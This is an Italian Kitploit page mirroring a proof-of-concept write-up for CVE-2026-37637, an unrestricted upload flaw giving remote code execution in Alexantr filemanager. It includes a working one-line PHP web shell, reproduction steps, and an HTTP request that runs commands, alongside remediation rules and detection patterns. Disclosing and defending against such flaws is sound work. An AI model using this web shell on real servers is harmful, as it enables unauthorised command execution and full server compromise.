Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-37637 — Esecuzione di codice remoto in Alexantr filemanager v1.0 tramite caricamento di file senza restrizioni | Kitploit
Strumenti/GitHubGitHub/slo-cyber-sec/cve-2026-37637
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubslo-cyber-sec/cve-2026-37637

CVE-2026-37637

Esecuzione di codice remoto in Alexantr filemanager v1.0 tramite caricamento di file senza restrizioni

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-37637

Proof of Concept per CVE-2026-37637 - Remote Code Execution in Alexantr filemanager v1.0 tramite upload di file senza restrizioni in filemanager.php.

Panoramica

CVE-2026-37637 è una vulnerabilità di Remote Code Execution che colpisce Alexantr filemanager v1.0.

La vulnerabilità esiste nel componente filemanager.php a causa di una validazione insufficiente dei file caricati. Un attaccante remoto può caricare un file PHP malevolo in una directory accessibile via web ed eseguire comandi arbitrari sul server.

Stato CVE: Inviato a MITRE
Ricercatore: CYBER-SEC Repository del vendor: https://github.com/alexantr/filemanager


Riepilogo della Vulnerabilità

ElementoDescrizione
ID CVECVE-2026-37637
Tipo di VulnerabilitàRemote Code Execution
Prodotto ColpitoAlexantr filemanager
Versione Colpitav1.0
Componente Vulnerabilefilemanager.php
Vettore di AttaccoRemoto
Autenticazione RichiestaDipende dalla distribuzione/configurazione
ImpattoEsecuzione di comandi arbitrari
Causa PrincipaleUpload di file senza restrizioni e mancanza di validazione lato server

Impatto

Un attaccante può caricare un file PHP malevolo tramite la funzionalità di upload dei file. Poiché i file caricati vengono memorizzati in una posizione accessibile via web e l'esecuzione di PHP è consentita, l'attaccante può eseguire comandi di sistema arbitrari sul server.

Lo sfruttamento riuscito può consentire a un attaccante di:

  • Eseguire comandi arbitrari sul server
  • Leggere file sensibili
  • Modificare o eliminare file dell'applicazione
  • Caricare ulteriore malware o web shell
  • Spostarsi ulteriormente nell'ambiente di hosting
  • Compromettere completamente il server colpito

Dettagli Tecnici

L'applicazione consente agli utenti di caricare file arbitrari senza validare correttamente l'estensione del file, il tipo MIME o il contenuto del file.

Un file PHP malevolo come il seguente può essere caricato:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Una volta caricato in una directory accessibile via web, l'attaccante può eseguire comandi accedendo al file tramite il browser e passando i comandi tramite il parametro cmd.

Esempio:

root@kitploit:~
http://target/uploads/shell.php?cmd=id

Ciò comporta l'esecuzione di comandi sul sistema operativo sottostante.


Passaggi per la Riproduzione

1. Clonare l'applicazione vulnerabile

root@kitploit:~
git clone https://github.com/alexantr/filemanager
cd filemanager

2. Avviare il server di sviluppo PHP

root@kitploit:~
php -S localhost:8000

3. Accedere all'applicazione

Aprire l'applicazione in un browser:

root@kitploit:~
http://localhost:8000/filemanager.php

A seconda della distribuzione o della configurazione, l'applicazione può essere accessibile anche tramite:

root@kitploit:~
http://localhost:8000/pheditor.php

4. Caricare un file PHP malevolo

Creare un file denominato shell.php:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Caricare il file utilizzando la funzionalità di upload dell'applicazione.

5. Eseguire un comando

Dopo aver caricato il file, accedervi direttamente dal browser:

root@kitploit:~
http://localhost:8000/uploads/shell.php?cmd=id

Se lo sfruttamento ha successo, il server eseguirà il comando e restituirà l'output.

Esempio di output:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Proof of Concept

Payload PHP Malevolo

root@kitploit:~
<?php system($_GET['cmd']); ?>

Esempio di Richiesta

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1
Host: target
User-Agent: Mozilla/5.0
Connection: close

Risultato Atteso

Il comando fornito tramite il parametro cmd viene eseguito sul server.


Causa Principale

La vulnerabilità è causata da una validazione lato server insufficiente nella funzionalità di upload dei file.

L'applicazione non limita correttamente:

  • Le estensioni dei file
  • I tipi MIME
  • Il contenuto dei file
  • La destinazione dell'upload
  • I permessi di esecuzione all'interno della directory di upload

Di conseguenza, i file PHP eseguibili possono essere caricati ed eseguiti direttamente.


Rimedio Raccomandato

Il vendor e gli utenti dovrebbero implementare le seguenti protezioni.

1. Bloccare le Estensioni di File Pericolose

Impedire l'upload di tipi di file eseguibili come:

root@kitploit:~
.php, .phtml, .php3, .php4, .php5, .phar

2. Utilizzare una Allowlist

Consentire solo i tipi di file previsti, ad esempio:

root@kitploit:~
.jpg, .png, .gif, .txt, .pdf

3. Validare il Tipo MIME e il Contenuto del File

Non fare affidamento solo sull'header Content-Type fornito dal client.

La validazione dei file deve essere eseguita lato server.

4. Memorizzare i File Caricati Fuori dalla Web Root

I file caricati non devono essere direttamente eseguibili o pubblicamente accessibili.

5. Disabilitare l'Esecuzione di PHP nelle Directory di Upload

Per Apache, questo può essere fatto con .htaccess:

root@kitploit:~
php_flag engine off
RemoveHandler .php .phtml .php3 .php4 .php5 .phar
RemoveType .php .phtml .php3 .php4 .php5 .phar

Per Nginx, impedire la gestione di PHP nei percorsi di upload:

root@kitploit:~
location /uploads/ {
    location ~ \.php$ {
        deny all;
    }
}

6. Rinominare i File Caricati

Utilizzare nomi di file casuali generati dal server e rimuovere le estensioni controllate dall'utente.

7. Applicare un Controllo degli Accessi Adeguato

Limitare la funzionalità di upload ai soli utenti fidati.


Rilevamento

Gli amministratori possono cercare file PHP sospetti caricati nelle directory accessibili via web.

Indicatori di esempio:

root@kitploit:~
shell.php
cmd.php
upload.php
backdoor.php
file .php all'interno delle directory di upload

I pattern di richiesta sospetti possono includere:

root@kitploit:~
?cmd=
?exec=
?shell=
?command=

Esempio di voce di log:

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1

Disclaimer

Questo repository è fornito esclusivamente a scopo educativo e di difesa della sicurezza.

Le informazioni e il proof of concept sono intesi ad aiutare sviluppatori, amministratori di sistema e professionisti della sicurezza a comprendere e correggere la vulnerabilità.

Non utilizzare queste informazioni per attaccare sistemi senza autorizzazione esplicita. L'accesso non autorizzato a sistemi informatici è illegale.

L'autore non è responsabile per qualsiasi uso improprio delle informazioni fornite in questo repository.


Riferimenti

  • https://github.com/alexantr/filemanager
  • https://cve.mitre.org/
Scarica lo strumento